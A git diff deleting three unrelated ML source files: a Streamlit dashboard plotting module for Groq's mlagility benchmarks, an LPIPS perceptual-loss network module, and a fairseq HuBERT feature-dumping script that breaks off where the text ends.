b/spaces/Groq/mlagility/graphs.py deleted file mode 100644 index 59ca68fa28b38615a20e1bc0fa2ee0a5c2b66713..0000000000000000000000000000000000000000 --- a/spaces/Groq/mlagility/graphs.py +++ /dev/null @@ -1,807 +0,0 @@ -from collections import Counter -from streamlit_echarts import st_echarts # pylint: disable=import-error -import numpy as np -import pandas as pd -import streamlit as st # pylint: disable=import-error -import plotly.figure_factory as ff -from plotly import graph_objs as go -import plotly.express as px -from statistics import median - -colors = { - "blue": "#5470c6", - "orange": "#FF7F0E", - "green": "#94cc74", - "saffron_mango": "#fac858", - "red": "#ee6666", - "light_blue": "#73c0de", - "ocean_green": "#3ba272", -} -device_colors = { - "x86": colors["blue"], - "nvidia": colors["green"], - "groq": colors["orange"], -} - - -class StageCount: - def __init__(self, df: pd.DataFrame) -> None: - self.all_models = len(df) - self.base_onnx = int(np.sum(df["base_onnx"])) - self.optimized_onnx = int(np.sum(df["optimized_onnx"])) - self.all_ops_supported = int(np.sum(df["all_ops_supported"])) - self.fp16_onnx = int(np.sum(df["fp16_onnx"])) - self.compiles = int(np.sum(df["compiles"])) - self.assembles = int(np.sum(df["assembles"])) - - -class DeviceStageCount: - def __init__(self, df: pd.DataFrame) -> None: - self.all_models = len(df) - self.base_onnx = 
int(np.sum(df["onnx_exported"])) - self.optimized_onnx = int(np.sum(df["onnx_optimized"])) - self.fp16_onnx = int(np.sum(df["onnx_converted"])) - self.x86 = df.loc[df.x86_latency != "-", "x86_latency"].count() - self.nvidia = df.loc[df.nvidia_latency != "-", "nvidia_latency"].count() - self.groq = df.loc[ - df.groq_estimated_latency != "-", "groq_estimated_latency" - ].count() - - -def stages_count_summary(current_df: pd.DataFrame, prev_df: pd.DataFrame) -> None: - """ - Show count of how many models compile, assemble, etc - """ - current = StageCount(current_df) - prev = StageCount(prev_df) - - kpi = st.columns(7) - - kpi[0].metric( - label="All models", - value=current.all_models, - delta=current.all_models - prev.all_models, - ) - - kpi[1].metric( - label="Converts to ONNX", - value=current.base_onnx, - delta=current.base_onnx - prev.base_onnx, - ) - - kpi[2].metric( - label="Optimizes ONNX file", - value=current.optimized_onnx, - delta=current.optimized_onnx - prev.optimized_onnx, - ) - - kpi[3].metric( - label="Supports all ops", - value=current.all_ops_supported, - delta=current.all_ops_supported - prev.all_ops_supported, - ) - - kpi[4].metric( - label="Converts to FP16", - value=current.fp16_onnx, - delta=current.fp16_onnx - prev.fp16_onnx, - ) - - kpi[5].metric( - label="Compiles", - value=current.compiles, - delta=current.compiles - prev.compiles, - ) - - kpi[6].metric( - label="Assembles", - value=current.assembles, - delta=current.assembles - prev.assembles, - ) - - # Show Sankey graph with percentages - sk_val = { - "All models": "100%", - "Converts to ONNX": str(int(100 * current.base_onnx / current.all_models)) - + "%", - "Optimizes ONNX file": str( - int(100 * current.optimized_onnx / current.all_models) - ) - + "%", - "Supports all ops": str( - int(100 * current.all_ops_supported / current.all_models) - ) - + "%", - "Converts to FP16": str(int(100 * current.fp16_onnx / current.all_models)) - + "%", - "Compiles": str(int(100 * current.compiles / current.all_models)) + "%", - "Assembles": str(int(100 * current.assembles / current.all_models)) + "%", - } - option = { - "series": { - "type": "sankey", - "animationDuration": 1, - "top": "0%", - "bottom": "20%", - "left": "0%", - "right": "13.5%", - "darkMode": "true", - "nodeWidth": 2, - "textStyle": {"fontSize": 16}, - "lineStyle": {"curveness": 0}, - "layoutIterations": 0, - "layout": "none", - "emphasis": {"focus": "adjacency"}, - "data": [ - { - "name": "All models", - "value": sk_val["All models"], - "itemStyle": {"color": "white", "borderColor": "white"}, - }, - { - "name": "Converts to ONNX", - "value": sk_val["Converts to ONNX"], - "itemStyle": {"color": "white", "borderColor": "white"}, - }, - { - "name": "Optimizes ONNX file", - "value": sk_val["Optimizes ONNX file"], - "itemStyle": {"color": "white", "borderColor": "white"}, - }, - { - "name": "Supports all ops", - "value": sk_val["Supports all ops"], - "itemStyle": {"color": "white", "borderColor": "white"}, - }, - { - "name": "Converts to FP16", - "value": sk_val["Converts to FP16"], - "itemStyle": {"color": "white", "borderColor": "white"}, - }, - { - "name": "Compiles", - "value": sk_val["Compiles"], - "itemStyle": {"color": "white", "borderColor": "white"}, - }, - { - "name": "Assembles", - "value": sk_val["Assembles"], - "itemStyle": {"color": "white", "borderColor": "white"}, - }, - ], - "label": { - "position": "insideTopLeft", - "borderWidth": 0, - "fontSize": 16, - "color": "white", - "textBorderWidth": 0, - "formatter": "{c}", - }, - "links": [ - { - 
"source": "All models", - "target": "Converts to ONNX", - "value": current.base_onnx, - }, - { - "source": "Converts to ONNX", - "target": "Optimizes ONNX file", - "value": current.optimized_onnx, - }, - { - "source": "Optimizes ONNX file", - "target": "Supports all ops", - "value": current.all_ops_supported, - }, - { - "source": "Supports all ops", - "target": "Converts to FP16", - "value": current.fp16_onnx, - }, - { - "source": "Converts to FP16", - "target": "Compiles", - "value": current.compiles, - }, - { - "source": "Compiles", - "target": "Assembles", - "value": current.assembles, - }, - ], - } - } - st_echarts( - options=option, - height="50px", - ) - - -def workload_origin(df: pd.DataFrame) -> None: - """ - Show pie chart that groups models by author - """ - all_authors = list(df.loc[:, "author"]) - author_count = {i: all_authors.count(i) for i in all_authors} - all_models = len(df) - - options = { - "darkMode": "true", - "textStyle": {"fontSize": 16}, - "tooltip": {"trigger": "item"}, - "series": [ - { # "Invisible" chart, used to show author labels - "name": "Name of corpus:", - "type": "pie", - "radius": ["70%", "70%"], - "data": [ - {"value": author_count[k], "name": k} for k in author_count.keys() - ], - "label": { - "formatter": "{b}\n{d}%", - }, - }, - { - # Actual graph where data is shown - "name": "Name of corpus:", - "type": "pie", - "radius": ["50%", "70%"], - "data": [ - {"value": author_count[k], "name": k} for k in author_count.keys() - ], - "emphasis": { - "itemStyle": { - "shadowBlur": 10, - "shadowOffsetX": 0, - "shadowColor": "rgba(0, 0, 0, 0.5)", - } - }, - "label": { - "position": "inner", - "formatter": "{c}", - "color": "black", - "textBorderWidth": 0, - }, - }, - { - # Show total number of models inside - "name": "Total number of models:", - "type": "pie", - "radius": ["0%", "0%"], - "data": [{"value": all_models, "name": "Total"}], - "silent": "true", - "label": { - "position": "inner", - "formatter": "{c}", - "color": "white", - "fontSize": 30, - "textBorderWidth": 0, - }, - }, - ], - } - st_echarts( - options=options, - height="400px", - ) - - -def parameter_histogram(df: pd.DataFrame, show_assembled=True) -> None: - # Add parameters histogram - all_models = [float(x) / 1000000 for x in df["params"] if x != "-"] - - hist_data = [] - group_labels = [] - - if all_models != []: - hist_data.append(all_models) - if show_assembled: - group_labels.append("Models we tried compiling") - else: - group_labels.append("All models") - - if show_assembled: - assembled_models = df[ - df["assembles"] == True # pylint: disable=singleton-comparison - ] - assembled_models = [ - float(x) / 1000000 for x in assembled_models["params"] if x != "-" - ] - if assembled_models != []: - hist_data.append(assembled_models) - group_labels.append("Assembled models") - - if hist_data: - fig = ff.create_distplot( - hist_data, - group_labels, - bin_size=25, - histnorm="", - colors=list(colors.values()), - curve_type="normal", - ) - fig.layout.update(xaxis_title="Parameters in millions") - fig.layout.update(yaxis_title="count") - fig.update_xaxes(range=[1, 1000]) - - st.plotly_chart(fig, use_container_width=True) - - else: - st.markdown( - """At least one model needs to reach the compiler to show this graph 😅""" - ) - - -def speedup_bar_chart_legacy(df: pd.DataFrame) -> None: - """ - This function will be removed when we start getting CPU numbers for the daily tests - """ - - # Prepare data - assembles = np.sum(df["assembles"]) - df = df[["model_name", "groq_nvidia_compute_ratio", 
"groq_nvidia_e2e_ratio"]] - df = df.sort_values(by=["model_name"]) - df = df[(df.groq_nvidia_compute_ratio != "-")] - df = df[(df.groq_nvidia_e2e_ratio != "-")] - df["groq_nvidia_compute_ratio"] = df["groq_nvidia_compute_ratio"].astype(float) - df["groq_nvidia_e2e_ratio"] = df["groq_nvidia_e2e_ratio"].astype(float) - - if len(df) == 0 and assembles > 0: - st.markdown( - ( - "We do not have GPU numbers for the model(s) mapped to the GroqChip." - " This is potentially due to lack of out-of-the-box TensorRT support." - ) - ) - elif assembles == 0: - st.markdown( - "Nothing to show here since no models have been successfully assembled." - ) - else: - data = [ - go.Bar( - x=df["model_name"], - y=df["groq_nvidia_compute_ratio"], - name="Compute only", - ), - go.Bar( - x=df["model_name"], - y=df["groq_nvidia_e2e_ratio"], - name="Compute + estimated I/O", - ), - ] - - layout = go.Layout( - barmode="overlay", - yaxis_title="Speedup compared to A100 GPU", - colorway=list(colors.values()), - ) - - fig = dict(data=data, layout=layout) - st.plotly_chart(fig, use_container_width=True) - - st.markdown( - ( - "*Estimated I/O does NOT include delays caused by Groq's runtime. " - "See FAQ for details." - ), - unsafe_allow_html=True, - ) - - -def speedup_text_summary_legacy(df: pd.DataFrame) -> None: - # pylint: disable=line-too-long - """ - This function will be removed when we start getting CPU numbers for the daily tests - """ - - # Remove empty elements and convert to float - df = df[(df.groq_nvidia_compute_ratio != "-")] - df = df[(df.groq_nvidia_e2e_ratio != "-")] - df["groq_nvidia_compute_ratio"] = df["groq_nvidia_compute_ratio"].astype(float) - df["groq_nvidia_e2e_ratio"] = df["groq_nvidia_e2e_ratio"].astype(float) - - # Show stats - st.markdown( - f"""





      Average speedup of GroqChip™ considering compute only:
      {round(df["groq_nvidia_compute_ratio"].mean(),2)}x
      min {round(df["groq_nvidia_compute_ratio"].min(),2)}x; median {round(median(df["groq_nvidia_compute_ratio"]),2)}x; max {round(df["groq_nvidia_compute_ratio"].max(),2)}x
      Average speedup of GroqChip™ considering compute + estimated I/O*:
      {round(df["groq_nvidia_e2e_ratio"].mean(),2)}x
      min {round(df["groq_nvidia_e2e_ratio"].min(),2)}x; median {round(median(df["groq_nvidia_e2e_ratio"]),2)}x; max {round(df["groq_nvidia_e2e_ratio"].max(),2)}x

      """, - unsafe_allow_html=True, - ) - - -def process_latency_data(df, baseline): - df = df[["model_name", "groq_estimated_latency", "nvidia_latency", "x86_latency"]] - df = df.rename(columns={"groq_estimated_latency": "groq_latency"}) - df = df.sort_values(by=["model_name"]) - - df.x86_latency.replace(["-"], [float("inf")], inplace=True) - df.nvidia_latency.replace(["-"], [float("inf")], inplace=True) - df.groq_latency.replace(["-"], [float("inf")], inplace=True) - - df["groq_latency"] = df["groq_latency"].astype(float) - df["nvidia_latency"] = df["nvidia_latency"].astype(float) - df["x86_latency"] = df["x86_latency"].astype(float) - - df["groq_compute_ratio"] = df[f"{baseline}_latency"] / df["groq_latency"] - df["nvidia_compute_ratio"] = df[f"{baseline}_latency"] / df["nvidia_latency"] - df["x86_compute_ratio"] = df[f"{baseline}_latency"] / df["x86_latency"] - - return df - - -def speedup_bar_chart(df: pd.DataFrame, baseline) -> None: - - if len(df) == 0: - st.markdown( - ("Nothing to show here since no models have been successfully benchmarked.") - ) - else: - df = process_latency_data(df, baseline) - bar_chart = {} - bar_chart["nvidia"] = go.Bar( - x=df["model_name"], - y=df["nvidia_compute_ratio"], - name="NVIDIA A100", - ) - bar_chart["groq"] = go.Bar( - x=df["model_name"], - y=df["groq_compute_ratio"], - name="GroqChip 1", - ) - bar_chart["x86"] = go.Bar( - x=df["model_name"], - y=df["x86_compute_ratio"], - name="Intel(R) Xeon(R)", - ) - - # Move baseline to the back of the plot - plot_sequence = list(bar_chart.keys()) - plot_sequence.insert(0, plot_sequence.pop(plot_sequence.index(baseline))) - - # Ensure that the baseline is the last bar - data = [bar_chart[device_type] for device_type in plot_sequence] - color_sequence = [device_colors[device_type] for device_type in plot_sequence] - - layout = go.Layout( - barmode="overlay", # group - legend={ - "orientation": "h", - "xanchor": "center", - "x": 0.5, - "y": 1.2, - }, - yaxis_title="Latency Speedup", - colorway=color_sequence, - height=500, - ) - - fig = dict(data=data, layout=layout) - st.plotly_chart(fig, use_container_width=True) - - st.markdown( - "*Estimated I/O does NOT include delays caused by Groq's runtime.", - unsafe_allow_html=True, - ) - - -def kpi_to_markdown( - compute_ratio, device, num_baseline_models, is_baseline=False, color="blue" -): - - if is_baseline: - title = f"""

      Median {device} Acceleration ({len(compute_ratio)} models):

      """ - return ( - title - + f"""

      {1}x (Baseline)

      """ - ) - - title = f"""

      Median {device} Acceleration ({len(compute_ratio)}/{num_baseline_models} models):

      """ - - if len(compute_ratio) > 0: - kpi_min, kpi_median, kpi_max = ( - round(compute_ratio.min(), 2), - round(median(compute_ratio), 2), - round(compute_ratio.max(), 2), - ) - else: - kpi_min, kpi_median, kpi_max = 0, 0, 0 - - return ( - title - + f"""

      {kpi_median}x
      min {kpi_min}x; max {kpi_max}x

      - """ - ) - - -def speedup_text_summary(df: pd.DataFrame, baseline) -> None: - - df = process_latency_data(df, baseline) - - # Some latencies are "infinite" because they could not be calculated - # To calculate statistics, we remove all elements of df where the baseline latency is inf - df = df[(df[baseline + "_latency"] != float("inf"))] - - # Setting latencies that could not be calculated to infinity also causes some compute ratios to be zero - # We remove those to avoid doing any calculations with infinite latencies - x86_compute_ratio = df["x86_compute_ratio"].to_numpy() - nvidia_compute_ratio = df["nvidia_compute_ratio"].to_numpy() - groq_compute_ratio = df["groq_compute_ratio"].to_numpy() - x86_compute_ratio = x86_compute_ratio[x86_compute_ratio != 0] - nvidia_compute_ratio = nvidia_compute_ratio[nvidia_compute_ratio != 0] - groq_compute_ratio = groq_compute_ratio[groq_compute_ratio != 0] - - num_baseline_models = len(df[f"{baseline}_compute_ratio"]) - x86_text = kpi_to_markdown( - x86_compute_ratio, - device="Intel(R) Xeon(R) X40 CPU @ 2.00GHz", - num_baseline_models=num_baseline_models, - color="blue", - is_baseline=baseline == "x86", - ) - groq_text = kpi_to_markdown( - groq_compute_ratio, - device="GroqChip 1 Estimated", - num_baseline_models=num_baseline_models, - color="orange", - is_baseline=baseline == "groq", - ) - nvidia_text = kpi_to_markdown( - nvidia_compute_ratio, - device="NVIDIA A100-PCIE-40GB", - num_baseline_models=num_baseline_models, - color="green", - is_baseline=baseline == "nvidia", - ) - - cols = st.columns(3) - with cols[0]: - st.markdown(f"""{x86_text}""", unsafe_allow_html=True) - with cols[1]: - st.markdown(f"""{nvidia_text}""", unsafe_allow_html=True) - with cols[2]: - st.markdown(f"""{groq_text}""", unsafe_allow_html=True) - - -def compiler_errors(df: pd.DataFrame) -> None: - compiler_errors = df[df["compiler_error"] != "-"]["compiler_error"] - compiler_errors = Counter(compiler_errors) - if len(compiler_errors) > 0: - compiler_errors = pd.DataFrame.from_dict( - compiler_errors, orient="index" - ).reset_index() - compiler_errors = compiler_errors.set_axis( - ["error", "count"], axis=1, inplace=False - ) - compiler_errors["error"] = [ce[:80] for ce in compiler_errors["error"]] - fig = px.bar( - compiler_errors, - x="count", - y="error", - orientation="h", - height=400, - ) - fig.update_traces(marker_color=colors["blue"]) - - st.plotly_chart(fig, use_container_width=True) - else: - st.markdown("""No compiler errors found :tada:""") - - -def io_fraction(df: pd.DataFrame) -> None: - fig = go.Figure() - for chips in ["1", "2", "4", "8"]: - tmp = df[[model_entry == chips for model_entry in df["groq_chips_used"]]] - if len(tmp) == 0: - continue - tmp = tmp[[model_entry != "-" for model_entry in tmp["groq_compute_latency"]]] - if len(tmp) == 0: - continue - tmp = tmp[[model_entry != "-" for model_entry in tmp["groq_latency"]]] - if len(tmp) == 0: - continue - print(len(tmp)) - compute_latency = tmp["groq_compute_latency"].astype("float") - e2e_latency = tmp["groq_latency"].astype("float") - - io_fraction = 1 - compute_latency / e2e_latency - if chips == "1": - name = f"{chips} GroqChip ({len(tmp)} models)" - else: - name = f"{chips} GroqChips \n({len(tmp)} models)" - fig.add_trace( - go.Box( - y=io_fraction, - name=name, - ) - ) - - fig.layout.update(xaxis_title="Models compiled for X GroqChip Processors") - fig.layout.update(yaxis_title="Estimated fraction of time (in %) spent on I/O") - fig.layout.update(colorway=list(colors.values())) - 
st.plotly_chart(fig, use_container_width=True) - - -def results_table(df: pd.DataFrame): - model_name = st.text_input("", placeholder="Filter model by name") - if model_name != "": - df = df[[model_name in x for x in df["Model Name"]]] - - st.dataframe(df, height=min((len(df) + 1) * 35, 35 * 21)) - - -def device_funnel_metrics(num_models: int, num_total_models: int) -> str: - """ - Calculates the percentage between models and total_models - Avoids ZeroDivisionError when dividend is zero - """ - models_message = f"{num_models} model" - models_message = models_message + "s" if num_models != 1 else models_message - percentage_message = "" - if num_total_models > 0: - model_ratio = num_models / num_total_models - if model_ratio < 0.01 and model_ratio != 0: - percentage_message = " - < 1%" - else: - percentage_message = f" - {int(100*num_models / num_total_models)}%" - return f"{models_message}{percentage_message}" - - -def device_funnel(df: pd.DataFrame) -> None: - """ - Show count of how many models compile, assemble, etc - """ - summ = DeviceStageCount(df) - - stages = [ - "All models", - "Export to ONNX", - "Optimize ONNX file", - "Convert to FP16", - "Acquire Performance", - ] - cols = st.columns(len(stages)) - - for idx, stage in enumerate(stages): - with cols[idx]: - st.markdown(stage) - - # Show Sankey graph with percentages - sk_val = { - "All models": device_funnel_metrics(summ.all_models, summ.all_models), - "Converts to ONNX": device_funnel_metrics(summ.base_onnx, summ.all_models), - "Optimizes ONNX file": device_funnel_metrics( - summ.optimized_onnx, summ.all_models - ), - "Converts to FP16": device_funnel_metrics(summ.fp16_onnx, summ.all_models), - "Acquires Nvidia Perf": device_funnel_metrics(summ.nvidia, summ.all_models) - + " (Nvidia)", - "Acquires Groq Perf": device_funnel_metrics(summ.groq, summ.all_models) - + " (Groq)", - "Acquires x86 Perf": device_funnel_metrics(summ.x86, summ.all_models) - + " (x86)", - } - - # Calculate bar heights for each of the devices - # Bar height is proportional to the number of models benchmarked by each device - default_bar_size = 1 - target_combined_height = max(default_bar_size, summ.fp16_onnx) - device_bar_size = target_combined_height / 3 - - option = { - "series": { - "type": "sankey", - "animationDuration": 1, - "top": "0%", - "bottom": "20%", - "left": "0%", - "right": "19%", - "darkMode": "true", - "nodeWidth": 2, - "textStyle": {"fontSize": 16}, - "nodeAlign": "left", - "lineStyle": {"curveness": 0}, - "layoutIterations": 0, - "nodeGap": 12, - "layout": "none", - "emphasis": {"focus": "adjacency"}, - "data": [ - { - "name": "All models", - "value": sk_val["All models"], - "itemStyle": {"color": "white", "borderColor": "white"}, - }, - { - "name": "Converts to ONNX", - "value": sk_val["Converts to ONNX"], - "itemStyle": {"color": "white", "borderColor": "white"}, - }, - { - "name": "Optimizes ONNX file", - "value": sk_val["Optimizes ONNX file"], - "itemStyle": {"color": "white", "borderColor": "white"}, - }, - { - "name": "Converts to FP16", - "value": sk_val["Converts to FP16"], - "itemStyle": {"color": "white", "borderColor": "white"}, - }, - { - "name": "Acquires Nvidia Perf", - "value": sk_val["Acquires Nvidia Perf"], - "itemStyle": { - "color": device_colors["nvidia"], - "borderColor": device_colors["nvidia"], - }, - }, - { - "name": "Acquires Groq Perf", - "value": sk_val["Acquires Groq Perf"], - "itemStyle": { - "color": device_colors["groq"], - "borderColor": device_colors["groq"], - }, - }, - { - "name": "Acquires x86 Perf", - 
"value": sk_val["Acquires x86 Perf"], - "itemStyle": { - "color": device_colors["x86"], - "borderColor": device_colors["x86"], - }, - }, - ], - "label": { - "position": "insideTopLeft", - "borderWidth": 0, - "fontSize": 16, - "color": "white", - "textBorderWidth": 0, - "formatter": "{c}", - }, - "links": [ - { - "source": "All models", - "target": "Converts to ONNX", - "value": max(default_bar_size, summ.all_models), - }, - { - "source": "Converts to ONNX", - "target": "Optimizes ONNX file", - "value": max(default_bar_size, summ.optimized_onnx), - }, - { - "source": "Optimizes ONNX file", - "target": "Converts to FP16", - "value": max(default_bar_size, summ.fp16_onnx), - }, - { - "source": "Converts to FP16", - "target": "Acquires Nvidia Perf", - "value": device_bar_size, - }, - { - "source": "Converts to FP16", - "target": "Acquires Groq Perf", - "value": device_bar_size, - }, - { - "source": "Converts to FP16", - "target": "Acquires x86 Perf", - "value": device_bar_size, - }, - ], - } - } - st_echarts( - options=option, - height="70px", - ) diff --git a/spaces/HaHaBill/LandShapes-Antarctica/models/stylegan2/stylegan2-pytorch/lpips/networks_basic.py b/spaces/HaHaBill/LandShapes-Antarctica/models/stylegan2/stylegan2-pytorch/lpips/networks_basic.py deleted file mode 100644 index 1d23f059de02880ed65d425d56baf0c03a9e99a6..0000000000000000000000000000000000000000 --- a/spaces/HaHaBill/LandShapes-Antarctica/models/stylegan2/stylegan2-pytorch/lpips/networks_basic.py +++ /dev/null @@ -1,187 +0,0 @@ - -from __future__ import absolute_import - -import sys -import torch -import torch.nn as nn -import torch.nn.init as init -from torch.autograd import Variable -import numpy as np -from pdb import set_trace as st -from skimage import color -from IPython import embed -from . 
import pretrained_networks as pn - -import lpips as util - -def spatial_average(in_tens, keepdim=True): - return in_tens.mean([2,3],keepdim=keepdim) - -def upsample(in_tens, out_H=64): # assumes scale factor is same for H and W - in_H = in_tens.shape[2] - scale_factor = 1.*out_H/in_H - - return nn.Upsample(scale_factor=scale_factor, mode='bilinear', align_corners=False)(in_tens) - -# Learned perceptual metric -class PNetLin(nn.Module): - def __init__(self, pnet_type='vgg', pnet_rand=False, pnet_tune=False, use_dropout=True, spatial=False, version='0.1', lpips=True): - super(PNetLin, self).__init__() - - self.pnet_type = pnet_type - self.pnet_tune = pnet_tune - self.pnet_rand = pnet_rand - self.spatial = spatial - self.lpips = lpips - self.version = version - self.scaling_layer = ScalingLayer() - - if(self.pnet_type in ['vgg','vgg16']): - net_type = pn.vgg16 - self.chns = [64,128,256,512,512] - elif(self.pnet_type=='alex'): - net_type = pn.alexnet - self.chns = [64,192,384,256,256] - elif(self.pnet_type=='squeeze'): - net_type = pn.squeezenet - self.chns = [64,128,256,384,384,512,512] - self.L = len(self.chns) - - self.net = net_type(pretrained=not self.pnet_rand, requires_grad=self.pnet_tune) - - if(lpips): - self.lin0 = NetLinLayer(self.chns[0], use_dropout=use_dropout) - self.lin1 = NetLinLayer(self.chns[1], use_dropout=use_dropout) - self.lin2 = NetLinLayer(self.chns[2], use_dropout=use_dropout) - self.lin3 = NetLinLayer(self.chns[3], use_dropout=use_dropout) - self.lin4 = NetLinLayer(self.chns[4], use_dropout=use_dropout) - self.lins = [self.lin0,self.lin1,self.lin2,self.lin3,self.lin4] - if(self.pnet_type=='squeeze'): # 7 layers for squeezenet - self.lin5 = NetLinLayer(self.chns[5], use_dropout=use_dropout) - self.lin6 = NetLinLayer(self.chns[6], use_dropout=use_dropout) - self.lins+=[self.lin5,self.lin6] - - def forward(self, in0, in1, retPerLayer=False): - # v0.0 - original release had a bug, where input was not scaled - in0_input, in1_input = (self.scaling_layer(in0), self.scaling_layer(in1)) if self.version=='0.1' else (in0, in1) - outs0, outs1 = self.net.forward(in0_input), self.net.forward(in1_input) - feats0, feats1, diffs = {}, {}, {} - - for kk in range(self.L): - feats0[kk], feats1[kk] = util.normalize_tensor(outs0[kk]), util.normalize_tensor(outs1[kk]) - diffs[kk] = (feats0[kk]-feats1[kk])**2 - - if(self.lpips): - if(self.spatial): - res = [upsample(self.lins[kk].model(diffs[kk]), out_H=in0.shape[2]) for kk in range(self.L)] - else: - res = [spatial_average(self.lins[kk].model(diffs[kk]), keepdim=True) for kk in range(self.L)] - else: - if(self.spatial): - res = [upsample(diffs[kk].sum(dim=1,keepdim=True), out_H=in0.shape[2]) for kk in range(self.L)] - else: - res = [spatial_average(diffs[kk].sum(dim=1,keepdim=True), keepdim=True) for kk in range(self.L)] - - val = res[0] - for l in range(1,self.L): - val += res[l] - - if(retPerLayer): - return (val, res) - else: - return val - -class ScalingLayer(nn.Module): - def __init__(self): - super(ScalingLayer, self).__init__() - self.register_buffer('shift', torch.Tensor([-.030,-.088,-.188])[None,:,None,None]) - self.register_buffer('scale', torch.Tensor([.458,.448,.450])[None,:,None,None]) - - def forward(self, inp): - return (inp - self.shift) / self.scale - - -class NetLinLayer(nn.Module): - ''' A single linear layer which does a 1x1 conv ''' - def __init__(self, chn_in, chn_out=1, use_dropout=False): - super(NetLinLayer, self).__init__() - - layers = [nn.Dropout(),] if(use_dropout) else [] - layers += [nn.Conv2d(chn_in, 
chn_out, 1, stride=1, padding=0, bias=False),] - self.model = nn.Sequential(*layers) - - -class Dist2LogitLayer(nn.Module): - ''' takes 2 distances, puts through fc layers, spits out value between [0,1] (if use_sigmoid is True) ''' - def __init__(self, chn_mid=32, use_sigmoid=True): - super(Dist2LogitLayer, self).__init__() - - layers = [nn.Conv2d(5, chn_mid, 1, stride=1, padding=0, bias=True),] - layers += [nn.LeakyReLU(0.2,True),] - layers += [nn.Conv2d(chn_mid, chn_mid, 1, stride=1, padding=0, bias=True),] - layers += [nn.LeakyReLU(0.2,True),] - layers += [nn.Conv2d(chn_mid, 1, 1, stride=1, padding=0, bias=True),] - if(use_sigmoid): - layers += [nn.Sigmoid(),] - self.model = nn.Sequential(*layers) - - def forward(self,d0,d1,eps=0.1): - return self.model.forward(torch.cat((d0,d1,d0-d1,d0/(d1+eps),d1/(d0+eps)),dim=1)) - -class BCERankingLoss(nn.Module): - def __init__(self, chn_mid=32): - super(BCERankingLoss, self).__init__() - self.net = Dist2LogitLayer(chn_mid=chn_mid) - # self.parameters = list(self.net.parameters()) - self.loss = torch.nn.BCELoss() - - def forward(self, d0, d1, judge): - per = (judge+1.)/2. - self.logit = self.net.forward(d0,d1) - return self.loss(self.logit, per) - -# L2, DSSIM metrics -class FakeNet(nn.Module): - def __init__(self, use_gpu=True, colorspace='Lab'): - super(FakeNet, self).__init__() - self.use_gpu = use_gpu - self.colorspace=colorspace - -class L2(FakeNet): - - def forward(self, in0, in1, retPerLayer=None): - assert(in0.size()[0]==1) # currently only supports batchSize 1 - - if(self.colorspace=='RGB'): - (N,C,X,Y) = in0.size() - value = torch.mean(torch.mean(torch.mean((in0-in1)**2,dim=1).view(N,1,X,Y),dim=2).view(N,1,1,Y),dim=3).view(N) - return value - elif(self.colorspace=='Lab'): - value = util.l2(util.tensor2np(util.tensor2tensorlab(in0.data,to_norm=False)), - util.tensor2np(util.tensor2tensorlab(in1.data,to_norm=False)), range=100.).astype('float') - ret_var = Variable( torch.Tensor((value,) ) ) - if(self.use_gpu): - ret_var = ret_var.cuda() - return ret_var - -class DSSIM(FakeNet): - - def forward(self, in0, in1, retPerLayer=None): - assert(in0.size()[0]==1) # currently only supports batchSize 1 - - if(self.colorspace=='RGB'): - value = util.dssim(1.*util.tensor2im(in0.data), 1.*util.tensor2im(in1.data), range=255.).astype('float') - elif(self.colorspace=='Lab'): - value = util.dssim(util.tensor2np(util.tensor2tensorlab(in0.data,to_norm=False)), - util.tensor2np(util.tensor2tensorlab(in1.data,to_norm=False)), range=100.).astype('float') - ret_var = Variable( torch.Tensor((value,) ) ) - if(self.use_gpu): - ret_var = ret_var.cuda() - return ret_var - -def print_network(net): - num_params = 0 - for param in net.parameters(): - num_params += param.numel() - print('Network',net) - print('Total number of parameters: %d' % num_params) diff --git a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/examples/hubert/simple_kmeans/dump_hubert_feature_s2t.py b/spaces/HarryLee/eCommerceImageCaptioning/fairseq/examples/hubert/simple_kmeans/dump_hubert_feature_s2t.py deleted file mode 100644 index 6fff4faf44a92d42504559ecea8ec1047d2e5f14..0000000000000000000000000000000000000000 --- a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/examples/hubert/simple_kmeans/dump_hubert_feature_s2t.py +++ /dev/null @@ -1,92 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. 
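# Illustrative note (not from the original file): HubertFeatureReaderS2T.read_audio() below
# expects zip-packed audio paths of the form "<archive>.zip:<byte_offset>:<byte_length>",
# e.g. a hypothetical "data/train_audio.zip:1024:32000"; the offset/length pair is passed to
# read_from_uncompressed_zip() to slice the raw bytes before decoding the waveform.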
- -import csv -import io -import logging -import os -import os.path as op -import sys - -from dump_hubert_feature import HubertFeatureReader -from feature_utils import get_shard_range, dump_feature -from fairseq.data.audio.audio_utils import get_waveform -from fairseq.data.audio.speech_to_text_dataset import ( - read_from_uncompressed_zip, -) - - -logging.basicConfig( - format="%(asctime)s | %(levelname)s | %(name)s | %(message)s", - datefmt="%Y-%m-%d %H:%M:%S", - level=os.environ.get("LOGLEVEL", "INFO").upper(), - stream=sys.stdout, -) -logger = logging.getLogger("dump_hubert_feature_s2t") - - -class HubertFeatureReaderS2T(HubertFeatureReader): - def read_audio(self, path, ref_len=None): - path, *extra = path.split(":") - assert len(extra) == 2 - assert path.endswith(".zip") - - data = read_from_uncompressed_zip(path, int(extra[0]), int(extra[1])) - f = io.BytesIO(data) - wav, sr = get_waveform(f) - assert sr == self.task.cfg.sample_rate, sr - if wav.ndim == 2: - wav = wav.mean(-1) - assert wav.ndim == 1, wav.ndim - if ref_len is not None and abs(ref_len - len(wav)) > 160: - logging.warning(f"ref {ref_len} != read {len(wav)} ({path})") - return wav - - -def get_path_iterator(root, tsv, nshard, rank): - with open(tsv) as f: - reader = csv.DictReader( - f, - delimiter="\t", - quotechar=None, - doublequote=False, - lineterminator="\n", - quoting=csv.QUOTE_NONE, - ) - subpaths = [op.join(root, e["audio"]) for e in reader] - start, end = get_shard_range(len(subpaths), nshard, rank) - subpaths = subpaths[start:end] - def iterate(): - for subpath in subpaths: - yield op.join(root, subpath), None - return iterate, len(subpaths) - - -def main( - root, tsv_path, ckpt_path, layer, nshard, rank, feat_dir, split, max_chunk -): - reader = HubertFeatureReaderS2T(ckpt_path, layer, max_chunk) - generator, num = get_path_iterator(root, tsv_path, nshard, rank) - dump_feature(reader, generator, num, split, nshard, rank, feat_dir) - - - -if __name__ == "__main__": - import argparse - - parser = argparse.ArgumentParser() - parser.add_argument("root") - parser.add_argument("tsv_path") - parser.add_argument("ckpt_path") - parser.add_argument("layer", type=int) - parser.add_argument("nshard", type=int) - parser.add_argument("rank", type=int) - parser.add_argument("feat_dir") 